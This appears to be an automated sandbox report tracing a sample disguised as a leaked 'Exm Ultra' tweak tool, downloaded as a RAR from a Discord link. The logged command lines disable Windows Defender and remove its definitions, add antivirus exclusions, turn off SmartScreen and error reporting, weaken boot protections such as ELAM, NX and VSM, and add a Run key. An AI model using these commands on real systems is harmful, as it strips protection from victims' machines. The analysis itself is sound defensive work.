msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&1⤵PID:1576
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5700 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:11⤵PID:1436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5744 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:11⤵PID:4180
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4544 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:3768
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6128 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:780
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6256 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:11⤵PID:684
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5572 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:11⤵PID:2176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5924 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:2420
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3168
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5432 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:1096
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4884 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:1040
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\EXM_Leaked.rar"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"2⤵
- Executes dropped EXE
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'"4⤵PID:868
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:1304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"4⤵PID:4308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"4⤵PID:3984
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5140 -
C:\Windows\SYSTEM32\cmd.execmd /c "Fn Opti.bat"6⤵PID:5216
-
C:\Windows\system32\timeout.exetimeout /t 27⤵
- Delays execution with timeout.exe
PID:6060
-
-
C:\Windows\system32\timeout.exetimeout /t 27⤵
- Delays execution with timeout.exe
PID:6104
-
-
C:\Windows\system32\fsutil.exefsutil behavior query memoryusage7⤵PID:4252
-
-
C:\Windows\system32\fsutil.exefsutil behavior set memoryusage 27⤵PID:3984
-
-
C:\Windows\system32\bcdedit.exebcdedit /set increaseuserva 80007⤵
- Modifies boot configuration data using bcdedit
PID:3796
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:5376
-
-
C:\Windows\system32\ipconfig.exeipconfig /renew7⤵
- Gathers network information
PID:5404
-
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:5492
-
-
C:\Windows\system32\netsh.exenetsh winsock reset7⤵PID:5524
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global chimney=enabled7⤵PID:5480
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global autotuninglevel=normal7⤵PID:5628
-
-
C:\Windows\system32\netsh.exenetsh int tcp set supplemental7⤵PID:3168
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global dca=enabled7⤵PID:332
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global netdma=enabled7⤵PID:5736
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global congestionprovider=ctcp7⤵PID:5784
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="StopThrottling" dir=in7⤵
- Modifies Windows Firewall
PID:3880
-
-
C:\Windows\system32\bcdedit.exebcdedit /set allowedinmemorysettings 07⤵
- Modifies boot configuration data using bcdedit
PID:5352
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue useplatformclock7⤵
- Modifies boot configuration data using bcdedit
PID:5284
-
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformtick Yes7⤵
- Modifies boot configuration data using bcdedit
PID:5364
-
-
C:\Windows\system32\bcdedit.exebcdedit /set tscsyncpolicy Enhanced7⤵
- Modifies boot configuration data using bcdedit
PID:5700
-
-
C:\Windows\system32\bcdedit.exebcdedit /set debug No7⤵
- Modifies boot configuration data using bcdedit
PID:2160
-
-
C:\Windows\system32\bcdedit.exebcdedit /set isolatedcontext No7⤵
- Modifies boot configuration data using bcdedit
PID:5160
-
-
C:\Windows\system32\bcdedit.exebcdedit /set pae ForceEnable7⤵
- Modifies boot configuration data using bcdedit
PID:4048
-
-
C:\Windows\system32\bcdedit.exebcdedit /set bootmenupolicy Legacy7⤵
- Modifies boot configuration data using bcdedit
PID:5132
-
-
C:\Windows\system32\bcdedit.exebcdedit /set usefirmwarepcisettings No7⤵
- Modifies boot configuration data using bcdedit
PID:5208
-
-
C:\Windows\system32\bcdedit.exebcdedit /set sos Yes7⤵
- Modifies boot configuration data using bcdedit
PID:3000
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disabledynamictick Yes7⤵
- Modifies boot configuration data using bcdedit
PID:4732
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disableelamdrivers Yes7⤵
- Modifies boot configuration data using bcdedit
PID:3536
-
-
C:\Windows\system32\bcdedit.exebcdedit /set quietboot Yes7⤵
- Modifies boot configuration data using bcdedit
PID:4604
-
-
C:\Windows\system32\bcdedit.exebcdedit /set x2apicpolicy Enable7⤵
- Modifies boot configuration data using bcdedit
PID:4260
-
-
C:\Windows\system32\bcdedit.exebcdedit /set vsmlaunchtype Off7⤵
- Modifies boot configuration data using bcdedit
PID:5824
-
-
C:\Windows\system32\bcdedit.exebcdedit /set usephysicaldestination No7⤵
- Modifies boot configuration data using bcdedit
PID:5268
-
-
C:\Windows\system32\bcdedit.exebcdedit /set ems No7⤵
- Modifies boot configuration data using bcdedit
PID:5204
-
-
C:\Windows\system32\bcdedit.exebcdedit /set firstmegabytepolicy UseAll7⤵
- Modifies boot configuration data using bcdedit
PID:2812
-
-
C:\Windows\system32\bcdedit.exebcdedit /set configaccesspolicy Default7⤵
- Modifies boot configuration data using bcdedit
PID:4800
-
-
C:\Windows\system32\bcdedit.exebcdedit /set linearaddress57 optin7⤵
- Modifies boot configuration data using bcdedit
PID:4760
-
-
C:\Windows\system32\bcdedit.exebcdedit /set noumex Yes7⤵
- Modifies boot configuration data using bcdedit
PID:2600
-
-
C:\Windows\system32\bcdedit.exebcdedit /set bootems No7⤵
- Modifies boot configuration data using bcdedit
PID:2244
-
-
C:\Windows\system32\bcdedit.exebcdedit /set graphicsmodedisabled No7⤵
- Modifies boot configuration data using bcdedit
PID:5828
-
-
C:\Windows\system32\bcdedit.exebcdedit /set extendedinput Yes7⤵
- Modifies boot configuration data using bcdedit
PID:5888
-
-
C:\Windows\system32\bcdedit.exebcdedit /set highestmode Yes7⤵
- Modifies boot configuration data using bcdedit
PID:5708
-
-
C:\Windows\system32\bcdedit.exebcdedit /set forcefipscrypto No7⤵
- Modifies boot configuration data using bcdedit
PID:5908
-
-
C:\Windows\system32\bcdedit.exebcdedit /set perfmem 07⤵
- Modifies boot configuration data using bcdedit
PID:5948
-
-
C:\Windows\system32\bcdedit.exebcdedit /set configflags 07⤵
- Modifies boot configuration data using bcdedit
PID:5936
-
-
C:\Windows\system32\bcdedit.exebcdedit /set uselegacyapicmode No7⤵
- Modifies boot configuration data using bcdedit
PID:5996
-
-
C:\Windows\system32\bcdedit.exebcdedit /set onecpu No7⤵
- Modifies boot configuration data using bcdedit
PID:5912
-
-
C:\Windows\system32\bcdedit.exebcdedit /set halbreakpoint No7⤵
- Modifies boot configuration data using bcdedit
PID:5968
-
-
C:\Windows\system32\bcdedit.exebcdedit /set forcelegacyplatform No7⤵
- Modifies boot configuration data using bcdedit
PID:5976
-
-
C:\Windows\system32\bcdedit.exebcdedit /set allowedinmemorysettings 07⤵
- Modifies boot configuration data using bcdedit
PID:6012
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue useplatformclock7⤵
- Modifies boot configuration data using bcdedit
PID:6040
-
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformtick Yes7⤵
- Modifies boot configuration data using bcdedit
PID:1948
-
-
C:\Windows\system32\bcdedit.exebcdedit /set tscsyncpolicy Enhanced7⤵
- Modifies boot configuration data using bcdedit
PID:4748
-
-
C:\Windows\system32\bcdedit.exebcdedit /set debug No7⤵
- Modifies boot configuration data using bcdedit
PID:5812
-
-
C:\Windows\system32\bcdedit.exebcdedit /set isolatedcontext No7⤵
- Modifies boot configuration data using bcdedit
PID:6068
-
-
C:\Windows\system32\bcdedit.exebcdedit /set pae ForceEnable7⤵
- Modifies boot configuration data using bcdedit
PID:4560
-
-
C:\Windows\system32\bcdedit.exebcdedit /set bootmenupolicy Legacy7⤵
- Modifies boot configuration data using bcdedit
PID:3280
-
-
C:\Windows\system32\bcdedit.exebcdedit /set usefirmwarepcisettings No7⤵
- Modifies boot configuration data using bcdedit
PID:6092
-
-
C:\Windows\system32\bcdedit.exebcdedit /set sos Yes7⤵
- Modifies boot configuration data using bcdedit
PID:3192
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disabledynamictick Yes7⤵
- Modifies boot configuration data using bcdedit
PID:3788
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disableelamdrivers Yes7⤵
- Modifies boot configuration data using bcdedit
PID:4828
-
-
C:\Windows\system32\bcdedit.exebcdedit /set quietboot Yes7⤵
- Modifies boot configuration data using bcdedit
PID:1188
-
-
C:\Windows\system32\bcdedit.exebcdedit /set x2apicpolicy Enable7⤵
- Modifies boot configuration data using bcdedit
PID:456
-
-
C:\Windows\system32\bcdedit.exebcdedit /set vsmlaunchtype Off7⤵
- Modifies boot configuration data using bcdedit
PID:1604
-
-
C:\Windows\system32\bcdedit.exebcdedit /set usephysicaldestination No7⤵
- Modifies boot configuration data using bcdedit
PID:6116
-
-
C:\Windows\system32\bcdedit.exebcdedit /set ems No7⤵
- Modifies boot configuration data using bcdedit
PID:3700
-
-
C:\Windows\system32\bcdedit.exebcdedit /set firstmegabytepolicy UseAll7⤵
- Modifies boot configuration data using bcdedit
PID:1104
-
-
C:\Windows\system32\bcdedit.exebcdedit /set configaccesspolicy Default7⤵
- Modifies boot configuration data using bcdedit
PID:3732
-
-
C:\Windows\system32\bcdedit.exebcdedit /set linearaddress57 optin7⤵
- Modifies boot configuration data using bcdedit
PID:6124
-
-
C:\Windows\system32\bcdedit.exebcdedit /set noumex Yes7⤵
- Modifies boot configuration data using bcdedit
PID:5136
-
-
C:\Windows\system32\bcdedit.exebcdedit /set bootems No7⤵
- Modifies boot configuration data using bcdedit
PID:5172
-
-
C:\Windows\system32\bcdedit.exebcdedit /set graphicsmodedisabled No7⤵
- Modifies boot configuration data using bcdedit
PID:4416
-
-
C:\Windows\system32\bcdedit.exebcdedit /set extendedinput Yes7⤵
- Modifies boot configuration data using bcdedit
PID:2460
-
-
C:\Windows\system32\bcdedit.exebcdedit /set highestmode Yes7⤵
- Modifies boot configuration data using bcdedit
PID:5292
-
-
C:\Windows\system32\bcdedit.exebcdedit /set forcefipscrypto No7⤵
- Modifies boot configuration data using bcdedit
PID:1240
-
-
C:\Windows\system32\bcdedit.exebcdedit /set perfmem 07⤵
- Modifies boot configuration data using bcdedit
PID:2428
-
-
C:\Windows\system32\bcdedit.exebcdedit /set configflags 07⤵
- Modifies boot configuration data using bcdedit
PID:5408
-
-
C:\Windows\system32\bcdedit.exebcdedit /set uselegacyapicmode No7⤵
- Modifies boot configuration data using bcdedit
PID:3260
-
-
C:\Windows\system32\bcdedit.exebcdedit /set onecpu No7⤵
- Modifies boot configuration data using bcdedit
PID:1760
-
-
C:\Windows\system32\bcdedit.exebcdedit /set halbreakpoint No7⤵
- Modifies boot configuration data using bcdedit
PID:5396
-
-
C:\Windows\system32\bcdedit.exebcdedit /set forcelegacyplatform No7⤵PID:5412
-
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformclock no7⤵PID:5532
-
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformtick yes7⤵PID:984
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disabledynamictick yes7⤵PID:5564
-
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformtick Yes7⤵PID:5516
-
-
C:\Windows\system32\bcdedit.exebcdedit /set tscsyncpolicy Enhanced7⤵PID:5500
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disableelamdrivers Yes7⤵PID:3928
-
-
C:\Windows\system32\bcdedit.exebcdedit /set vsmlaunchtype Off7⤵PID:1548
-
-
C:\Windows\system32\bcdedit.exebcdedit /set firstmegabytepolicy UseAll7⤵PID:4860
-
-
C:\Windows\system32\bcdedit.exebcdedit /set forcefipscrypto No7⤵PID:4968
-
-
C:\Windows\system32\bcdedit.exebcdedit /set perfmem 07⤵PID:752
-
-
C:\Windows\system32\bcdedit.exebcdedit /set configflags 07⤵PID:5436
-
-
C:\Windows\system32\bcdedit.exebcdedit /set tscsyncpolicy Enhanced7⤵PID:5660
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disabledynamictick yes7⤵PID:5568
-
-
C:\Windows\system32\bcdedit.exebcdedit /set nx AlwaysOff7⤵PID:3484
-
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformtick yes7⤵PID:1668
-
-
C:\Windows\system32\bcdedit.exebcdedit /set vsmlaunchtype Off7⤵PID:4624
-
-
C:\Windows\system32\bcdedit.exebcdedit /set forcefipscrypto No7⤵PID:2476
-
-
C:\Windows\system32\bcdedit.exebcdedit /timeout 27⤵PID:3492
-
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformclock no7⤵PID:3168
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disabledynamictick yes7⤵PID:5740
-
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformtick yes7⤵PID:3592
-
-
C:\Windows\system32\bcdedit.exebcdedit /set nx optout7⤵PID:5676
-
-
C:\Windows\system32\bcdedit.exebcdedit /set bootux disabled7⤵PID:5736
-
-
C:\Windows\system32\bcdedit.exebcdedit /set bootmenupolicy standard7⤵PID:5760
-
-
C:\Windows\system32\bcdedit.exebcdedit /set hypervisorlaunchtype off7⤵PID:3392
-
-
C:\Windows\system32\bcdedit.exebcdedit /set tpmbootentropy ForceDisable7⤵PID:5308
-
-
C:\Windows\system32\bcdedit.exebcdedit /set quietboot yes7⤵PID:1736
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymous" /t REG_DWORD /d "1" /f7⤵PID:3880
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymoussam" /t REG_DWORD /d "1" /f7⤵PID:4140
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f7⤵PID:5788
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableWindowsSpotlightFeatures" /t REG_DWORD /d "1" /f7⤵PID:5080
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "LastActiveClick" /t REG_DWORD /d "1" /f7⤵PID:3804
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableBalloonTips" /t REG_DWORD /d "0" /f7⤵PID:5128
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarGlomLevel" /t REG_DWORD /d "2" /f7⤵PID:5392
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f7⤵PID:5648
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "0" /f7⤵
- Modifies visibility of file extensions in Explorer
PID:5696
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisableThumbnailCache" /t REG_DWORD /d "1" /f7⤵PID:5544
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "SeparateProcess" /t REG_DWORD /d "1" /f7⤵PID:2028
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "ConfirmFileDelete" /t REG_DWORD /d "1" /f7⤵PID:5724
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisableThumbnailsOnNetworkFolders" /t REG_DWORD /d "1" /f7⤵PID:5640
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "TaskbarNoNotification" /t REG_DWORD /d "0" /f7⤵PID:5424
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveSearch" /t REG_DWORD /d "1" /f7⤵PID:5288
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveTrack" /t REG_DWORD /d "1" /f7⤵PID:5512
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /t REG_DWORD /d "221" /f7⤵PID:2124
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLowDiskSpaceChecks" /t REG_DWORD /d "1" /f7⤵PID:4872
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f7⤵PID:868
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f7⤵PID:5244
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "NoWindowMinimizingShortcuts" /t REG_DWORD /d "1" /f7⤵PID:4348
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /t REG_SZ /d "0" /f7⤵PID:880
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "CompositionPolicy" /t REG_DWORD /d "1" /f7⤵PID:840
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "1" /f7⤵PID:4308
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\Services\LanmanServer\Parameters" /v "SizReqBuf" /t REG_DWORD /d "16384" /f7⤵PID:224
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f7⤵PID:1304
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f7⤵PID:4556
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f7⤵PID:3536
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f7⤵PID:4604
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f7⤵PID:4260
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\CursorShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f7⤵PID:5824
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\DropShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f7⤵PID:5268
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\MenuAnimation" /v "DefaultApplied" /t REG_DWORD /d "0" /f7⤵PID:5204
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\TaskbarAnimations" /v "DefaultApplied" /t REG_DWORD /d "0" /f7⤵PID:2812
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d "1" /f7⤵PID:4800
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "AutoApproveOSDumps" /t REG_DWORD /d "0" /f7⤵PID:408
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f7⤵PID:3144
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f7⤵PID:5840
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f7⤵PID:5856
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f7⤵PID:5904
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f7⤵PID:5960
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Mouse" /v "MouseHoverTime" /t REG_SZ /d "100" /f7⤵PID:5944
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "RunStartupScriptSync" /t REG_DWORD /d "0" /f7⤵PID:5972
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer" /v "GlobalAssocChangedCounter" /t REG_DWORD /d "91" /f7⤵PID:5980
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f7⤵PID:5952
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f7⤵PID:5992
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f7⤵PID:5920
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWebOverMeteredConnections" /t REG_DWORD /d "0" /f7⤵PID:6004
-
-
